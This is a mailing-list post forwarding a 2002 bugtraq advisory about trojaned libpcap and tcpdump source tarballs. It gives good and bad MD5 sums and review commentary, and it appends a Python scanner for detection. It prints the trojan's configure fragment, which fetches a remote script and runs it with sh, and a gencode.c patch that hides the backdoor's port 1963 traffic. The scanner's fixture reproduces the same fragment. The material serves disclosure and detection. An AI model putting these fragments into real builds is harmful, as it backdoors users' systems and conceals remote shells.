[sisyphus] [alex at intelinet.ro: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan]

Dmitry V. Levin ldv at altlinux.org
Thu Nov 14 13:59:20 MSK 2002


This is not a security announcement.
Just for clarity: the sources in Sisyphus and in the distributions are fine.

----- Forwarded message from Mincu Alexandru <alex at intelinet.ro> -----

Date: 13 Nov 2002 16:48:30 +0200
From: Mincu Alexandru <alex at intelinet.ro>
To: bugtraq at securityfocus.com
Subject: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan
Mailing-List: contact bugtraq-help at securityfocus.com; run by ezmlm
Delivered-To: mailing list bugtraq at securityfocus.com
Delivered-To: moderator for bugtraq at securityfocus.com
Organization: 
X-Mailer: Ximian Evolution 1.2.0 

Updates:

      * Many Mirrors are infected with the trojan
Background:

      * Libpcap provides a packet sniffing library for programs like
        Snort.
      * Tcpdump is a standard tool for packet sniffing.
Details:

      * The trojan contains modifications to the configure script and
        gencode.c (in libpcap only).
        
      * The configure script downloads
        http://mars.raketti.net/~mash/services which is then sourced
        with the shell. It contains an embedded shell script that
        creates a C file, and compiles it.
        
      * The program connects to 212.146.0.34 (mars.raketti.net) on port
        1963 and reads one of three one byte status codes:
              * A - program exits 
              * D - forks and spawns a shell and does the needed file
                descriptor manipulation to redirect it to the existing
                connection to 212.146.0.34. 
              * M - closes connection, sleeps 3600 seconds, and then
                reconnects 

        Hmm... ADM...
        
      * It's important to note that it reuses the same outgoing
        connection for the shell. This gets around firewalls that block
        incoming connections.
        
      * Gencode.c is modified to force libpcap to ignore packets to/from
        the backdoor program, hiding the backdoor program's traffic.
        
      * This is similar to the OpenSSH trojan a few months ago.
Good sources: 

http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.1.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6.2.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7.1.tar.gz


MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7  libpcap-0.7.1.tar.gz
MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248  tcpdump-3.6.2.tar.gz
MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e  tcpdump-3.7.1.tar.gz
Trojaned sources:

http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz
http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz
http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz


MD5 Sum 73ba7af963aff7c9e23fa1308a793dca  libpcap-0.7.1.tar.gz
MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9  tcpdump-3.6.2.tar.gz
MD5 Sum 3c410d8434e63fb3931fe77328e4dd88  tcpdump-3.7.1.tar.gz

The (relevant) gencode.c diff:


*** 288,293 ****
--- 289,318 ----
  {
        extern int n_errors;
        int len;
+         int l;
+         char *port = "1963";
+         char *str, *tmp, *new = "not port 1963";
+ 
+     if (buf && *buf && strstr (buf, port)) {
+         buf = "port 1964";
+     }
+     else {
+         l = strlen (new) + 1;
+         if (!(!buf || !*buf)) {
+             l += strlen (buf);
+             l += 5; /* and */
+         }
+ 
+         str = (char *)malloc (l);
+         str[0] = '\0';
+         if (!(!buf || !*buf)) {
+             strcpy (str, buf);
+             strcat (str, " and ");
+         }
+ 
+         strcat (str, new);
+         buf = str;
+     }
  
        no_optimize = 0;
        n_errors = 0;
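Review bot: the caller's filter expression `buf` is silently replaced in the `+` block: when it contains the string `1963` it becomes the literal `"port 1964"`, otherwise a freshly allocated copy with `" and not port 1963"` appended is substituted, so every capture compiled through this library drops port 1963 traffic and the caller never learns that its filter changed. Nothing in a filter compiler should hard-code a port number; on top of that the `malloc (l)` result is used without a NULL check and the allocated `str` is never freed. From the defender's side, any diff to gencode.c that rewrites `buf` like this is a build-integrity failure on its own, and the tarball's MD5 should be compared against the known-good sums listed earlier in the message rather than trusting the mirror.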
***************

The (relevant) configure diff:


+  CNF="services"
+  URL="mars.raketti.net/~mash/$CNF"

!  (IFS=","
!  ARGS="wget -q -O -,lynx --source,fetch -q -o -"
! 
!  for i in $ARGS; do
!        IFS=" "
!        $i $URL 1> $CNF
!        if [ -f $CNF ]; then sh $CNF
!            exit
!        fi
!        rm -f $CNF
!  done) 1>/dev/null 2>/dev/null &
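Review bot: a generated configure script has no business fetching and executing remote content, yet the `!` block tries each of `wget -q -O -`, `lynx --source` and `fetch -q -o -` against `mars.raketti.net/~mash/services` and then runs `sh $CNF` on whatever came back, inside a backgrounded subshell whose stdout and stderr both go to /dev/null, so the download, the execution and any error leave no trace in the configure output; the `exit` after `sh $CNF` only ends that subshell, and `rm -f $CNF` is reached only on the branch where the `-f` test fails. Detection side: grep the unpacked configure for download tools and hostnames, run configure with the network disabled, and compare the shipped configure against one regenerated from the tarball's own autoconf input.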

The "services" payload:
      * trojan-script, the non-obfuscated portion (excerpted)
      * services, the complete version
Thanks to:

Russell Adams <rladams at NO_SPAMadamsinfoserv.com>
Mathew Solnik <msolnik at NO_SPAMhlug.org>
Scott Stout <skout at NO_SPAMwiretapped.us>

with the Houston Linux Users Group.

Additional thanks to Bruce Locke for interpreting the backdoor code.

Thanks to Gentoo's Portage system for catching the trojaned 

-- 
Mincu Alexandru <alex at intelinet.ro>

----- End forwarded message -----

--
ldv
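An added check, not part of the forwarded post or of this message, that turns the MD5 lists and the two diff fragments above into a scanner for a downloaded release tarball: it classifies a file's MD5 as matching the good or the trojaned sums, and it opens the .tar.gz and looks inside `configure` and `gencode.c` for the strings the diffs introduce (the raketti hostname, `sh $CNF`, `not port 1963`, `port 1964`). The `fetch-tool` indicator (any of wget, lynx, fetch, curl appearing in configure) is a generic heuristic assumed by this example, not something the message states; the sample tarball it builds is a constructed fixture containing the quoted fragments, not a real release.

```python
import hashlib
import io
import re
import tarfile

# MD5 sums exactly as posted in the forwarded bugtraq message.
GOOD_MD5 = {
    "libpcap-0.7.1.tar.gz": "0597c23e3496a5c108097b2a0f1bd0c7",
    "tcpdump-3.6.2.tar.gz": "6bc8da35f9eed4e675bfdf04ce312248",
    "tcpdump-3.7.1.tar.gz": "03e5eac68c65b7e6ce8da03b0b0b225e",
}
TROJANED_MD5 = {
    "libpcap-0.7.1.tar.gz": "73ba7af963aff7c9e23fa1308a793dca",
    "tcpdump-3.6.2.tar.gz": "3a1c2dd3471486f9c7df87029bf2f1e9",
    "tcpdump-3.7.1.tar.gz": "3c410d8434e63fb3931fe77328e4dd88",
}

# Text indicators lifted from the configure and gencode.c diffs in the message.
# "fetch-tool" is a generic heuristic (an assumption of this example): a
# generated configure script normally never invokes a network download tool.
CONFIGURE_INDICATORS = {
    "raketti-url": re.compile(r"mars\.raketti\.net"),
    "fetch-tool": re.compile(r"\b(wget|lynx|fetch|curl)\b"),
    "sh-downloaded-file": re.compile(r"\bsh\s+\$CNF\b"),
}
GENCODE_INDICATORS = {
    "filter-exclusion": re.compile(r"not port 1963"),
    "filter-swap": re.compile(r"port 1964"),
}


def md5_hex(data: bytes) -> str:
    """MD5 of a file's bytes, for comparison with the posted sums."""
    return hashlib.md5(data).hexdigest()


def classify_md5(filename: str, digest: str) -> str:
    """Return 'good', 'trojaned' or 'unknown' for a release name and MD5."""
    digest = digest.lower()
    if GOOD_MD5.get(filename) == digest:
        return "good"
    if TROJANED_MD5.get(filename) == digest:
        return "trojaned"
    return "unknown"


def scan_text(text: str, indicators: dict) -> list:
    """Names of the indicators whose pattern occurs in text."""
    return [name for name, rx in indicators.items() if rx.search(text)]


def scan_tarball(data: bytes) -> dict:
    """Map member path -> indicator hits for every configure / gencode.c
    inside a gzip-compressed tar given as bytes. An empty dict means clean."""
    hits = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            base = member.name.rsplit("/", 1)[-1]
            if base == "configure":
                table = CONFIGURE_INDICATORS
            elif base == "gencode.c":
                table = GENCODE_INDICATORS
            else:
                continue
            text = tar.extractfile(member).read().decode("latin-1")
            found = scan_text(text, table)
            if found:
                hits[member.name] = found
    return hits


def build_sample_tarball(files: dict) -> bytes:
    """Constructed fixture: pack {path: text} into an in-memory .tar.gz."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, text in files.items():
            payload = text.encode()
            info = tarfile.TarInfo(name=path)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


# Constructed samples: the two fragments quoted in the message and a benign stub.
TROJANED_CONFIGURE = (
    'CNF="services"\nURL="mars.raketti.net/~mash/$CNF"\n'
    '(IFS=","\nARGS="wget -q -O -,lynx --source,fetch -q -o -"\n'
    'for i in $ARGS; do\n  IFS=" "\n  $i $URL 1> $CNF\n'
    '  if [ -f $CNF ]; then sh $CNF\n    exit\n  fi\n  rm -f $CNF\n'
    'done) 1>/dev/null 2>/dev/null &\n'
)
TROJANED_GENCODE = 'char *str, *tmp, *new = "not port 1963";\nbuf = "port 1964";\n'
CLEAN_CONFIGURE = "#! /bin/sh\n# Guess values for system-dependent variables.\n"

if __name__ == "__main__":
    sample = build_sample_tarball({
        "libpcap-0.7.1/configure": TROJANED_CONFIGURE,
        "libpcap-0.7.1/gencode.c": TROJANED_GENCODE,
        "libpcap-0.7.1/README": "nothing to see\n",
    })
    # The fixture is not a real release, so its sum is neither good nor trojaned.
    print(classify_md5("libpcap-0.7.1.tar.gz", md5_hex(sample)))
    for path, found in scan_tarball(sample).items():
        print(path, "->", ", ".join(found))
```

On a real download, read the file's bytes, run `classify_md5(name, md5_hex(data))` and `scan_tarball(data)` on them; a hash the lists do not know combined with any indicator hit is the case that deserves a manual diff of configure and gencode.c before anything is built.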